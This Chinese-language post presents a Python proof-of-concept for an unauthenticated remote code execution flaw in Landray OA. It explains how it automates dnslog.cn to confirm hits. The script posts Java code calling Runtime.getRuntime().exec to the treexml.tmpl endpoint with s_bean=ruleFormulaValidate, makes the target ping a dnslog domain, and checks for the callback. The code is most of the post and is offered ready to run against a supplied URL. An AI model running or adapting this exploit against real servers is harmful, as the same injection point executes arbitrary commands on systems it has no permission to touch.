这里我们借助 Burp 的辅助工具来构造前期的请求包，这样只需要专注于逻辑处理。
这里就可以用 Python 对这个请求包发起请求。
好了 不废话 上正文
蓝凌未授权rce poc
import argparse
import sys
import requests
import time
import random
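def random_str(n):
    """Return a string of ``n`` random lowercase ASCII letters (a-z).

    Args:
        n: number of characters to generate; ``n <= 0`` yields ``""``.

    Returns:
        A ``str`` of length ``max(n, 0)`` drawn with ``random.randint``.

    Note: this uses the non-cryptographic ``random`` module. In this file
    the value only serves as a throwaway PHPSESSID value for the dnslog
    session (see ``cookie`` below), so that is acceptable here; do not
    reuse it for anything that must be unguessable (use ``secrets``).
    """
    # ``str.join`` over a generator avoids the quadratic ``+=`` build-up
    # and no longer shadows the builtin ``str`` as the original did.
    # randint(97, 122) keeps the same draw sequence, so seeded output
    # is unchanged.
    return "".join(chr(random.randint(97, 122)) for _ in range(n))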
# Session cookie value for the dnslog service: 26 random lowercase letters.
# The same value is sent as PHPSESSID on both the getdomain.php and the
# getrecords.php calls below, presumably so the record lookup refers to the
# domain that was handed out — confirm against the service's behaviour.
cookie = random_str(26)
# Browser-like headers used only for the requests to dnslog.cn
# (``test`` below builds its own header set for the target request).
headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1",
           "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:100.0) Gecko/20000101 Firefox/100.0",
           "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
           "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
def get_domain_or_check(type):
    """Talk to dnslog.cn either to obtain a callback domain or to poll it.

    Args:
        type: 1 -> request a fresh dnslog domain, print it and return it;
              2 -> poll the recorded lookups for that domain and print
              whether anything arrived. Any other value does nothing and
              the function returns ``None``. (``type`` shadows the builtin
              of the same name; kept as-is because callers pass it
              positionally.)

    Returns:
        The response body (the domain) for ``type == 1``; ``None`` otherwise.

    Both branches send the module-level ``cookie`` as PHPSESSID together
    with the module-level browser-like ``headers``.
    """
    if type == 1:
        url = "http://www.dnslog.cn:80/getdomain.php"
        cookies = {"PHPSESSID": cookie}
        res = requests.get(url, headers=headers, cookies=cookies)
        print("[+] dnslog:" + res.text)
        return res.text
    elif type == 2:
        # Fixed ``t`` query value — looks like a cache-buster copied from a
        # browser request; verify it is not significant server-side.
        url = "http://dnslog.cn:80/getrecords.php?t=0.18836534176098696"
        cookies = {"PHPSESSID": cookie}
        # Short delay to give the out-of-band DNS lookup time to be recorded.
        time.sleep(0.8)
        res = requests.get(url, headers=headers, cookies=cookies)
        # A body longer than 2 characters is treated as "records present";
        # presumably an empty result is ``[]`` — confirm against the service.
        if len(res.text) > 2:
            print("[+] Success 漏洞存在: " + res.text)
        else:
            print("[+] 漏洞不存在")
def test(url):
    """Send the check request to ``url`` and report the result via dnslog.

    Requests a dnslog domain, embeds ``ping <domain>`` in the ``script``
    form field posted to ``data/sys-common/treexml.tmpl`` with
    ``s_bean=ruleFormulaValidate``, and on HTTP 200 polls dnslog for a
    resulting DNS lookup. Any non-200 status is printed as "not present".
    A 200 on its own is not evidence; only the dnslog record is.

    NOTE(defense): the request shape visible here — that path, the
    ``s_bean`` value and a ``script`` parameter containing
    ``Runtime.getRuntime().exec`` — is what a WAF rule or an access-log
    search for this issue should match on.

    Args:
        url: base URL of the target, with or without a trailing slash.

    Returns:
        ``None``; results are printed.
    """
    # The payload command is a DNS-only side effect: ping the dnslog domain.
    cmd = "ping " + get_domain_or_check(1)
    # Header set for the target request (distinct from the module-level
    # ``headers`` used for dnslog).
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36",
        "Connection": "close", "Accept": "*/*", "Accept-Language": "en",
        "Content-Type": "application/x-www-form-urlencoded", "Pragma": "no-cache", "Accept-Encoding": "gzip, deflate"}
    # ``str(cmd)`` is redundant (``cmd`` is already a str); left unchanged.
    data = {"s_bean": "ruleFormulaValidate", "script": "try {String cmd = \"" + str(
        cmd) + "\";Process process = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);}"}
    # Normalise the base URL so exactly one "/" separates it from the path.
    if url[-1] != "/":
        url = url + "/data/sys-common/treexml.tmpl"
    else:
        url = url + "data/sys-common/treexml.tmpl"
    res = requests.post(url, headers=headers, data=data)
    if res.status_code == 200:
        # Only a 200 triggers the dnslog poll; the poll decides the verdict.
        get_domain_or_check(2)
    else:
        print("[+] 状态码" + str(res.status_code) + " 漏洞不存在")
def parse_args():
    """Parse the command line; the only option is the required ``-u/--url``.

    Returns:
        The ``argparse.Namespace`` with a single ``url`` attribute.
    """
    usage_example = f"\tExample: \r\npython {sys.argv[0]} -u target"
    parser = argparse.ArgumentParser(epilog=usage_example)
    # Rename the default options-group heading shown by --help
    # (argparse offers no public setter for this, hence the private attr).
    parser._optionals.title = "OPTIONS"
    parser.add_argument("-u", "--url", help="url.", required=True, type=str)
    namespace = parser.parse_args()
    return namespace
if __name__ == "__main__":
    # Print the banner, then run the check against the URL given via -u/--url.
    print("\033[1;32mAuthor: by567 暗\033[0m")
    target = parse_args().url
    test(target)
这里通过分析 dnslog 的 getdomain.php 和 getrecords.php 接口来获取 dnslog 测试结果。
通过 getdomain.php 获取测试用的 dnslog 域名；这里 PHPSESSID 需要设置为我们自己构造的值，随后的查询才能取到结果。
接着就是发起请求，并对返回的数据包进行分析处理。
代码写的比较low 大佬勿喷